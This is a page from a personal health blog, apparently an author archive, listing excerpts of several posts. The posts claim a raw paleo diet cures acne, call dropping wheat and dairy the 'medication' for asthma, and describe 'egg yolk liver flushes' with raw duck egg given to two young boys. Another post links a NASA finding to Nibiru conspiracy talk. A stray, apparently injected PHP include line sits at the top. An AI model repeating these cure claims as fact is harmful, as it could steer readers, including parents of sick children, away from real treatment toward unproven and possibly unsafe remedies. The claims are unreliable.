@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 46 of 235

Author: Good Samaritan

rawPALEODIETforum.com replaces rawPALEOFORUM.com – The Most Widely Read Paleo Diet Forum

rawPALEODIETforum.com replaces rawPALEOFORUM.com – The Most Widely Read Paleo Diet Forum. From here on May 21st, 2011 we are now known as www.rawpaleodietforum.com from the old domain www.rawpaleoforum.com All traffic to www.rawpaleoforum.com will still be caught and links are all updated to reflect the new www.rawpaleodietforum.com domain I have...

Best Acne Treatments For Oily Skin?

What are the best acne treatments for oily skin? It’s called paleo diet.  Where 100% RAW paleo diet is best and cooked paleo diet a far second in effectiveness. Acne is merely detox through your skin.  Cooked food is just dirty and polluted.  Humans are not meant to eat...

Medications for Asthma? Sans Wheat and Sans Dairy!

A friend called me to ask what the cure for asthma was. I said it’s in my curemanual.com at http://www.curemanual.com/diseases-and-tweaks/how-to-cure-asthma/ Medications for asthma are: Sans wheat and sans dairy! Ha ha! Betcha most people don’t like that medication. The tragedy for most asthma sufferers is they are addicted to...

NASA: Free Floating Planets – Nibiru ? Planet X ? Elenin ?

Ha ha ha ha ha. NASA admits to Free Floating Planets in the Galaxy. Not only admitting they exist, but that they are PLENTY. This could be just the tip of the iceberg. The team estimates there are about twice as many free-floating Jupiter-mass planets as stars. In addition,...

Proud Mom Announces Her Son’s Circumcision on Facebook

The tradition of circumcision is alive and well in the Philippines. I know there are anti-circumcision groups being formed in the good old imperial nation and they probably want to rain down on the Philippines and re-educate Filipinos on why we should not circumcise our boys. Here is a...

Egg Yolk Liver Flush Results for 9 yr old and 7 yr old Boys

My 2 boys have been handed to me by my wife for clearing their itchy eczematic legs. Putting them on a raw paleo diet. Started their regimen with egg yolk liver flushes. Came up with 1 raw duck egg plus 1/4 cup of freshly squeezed calamansi juice plus 1...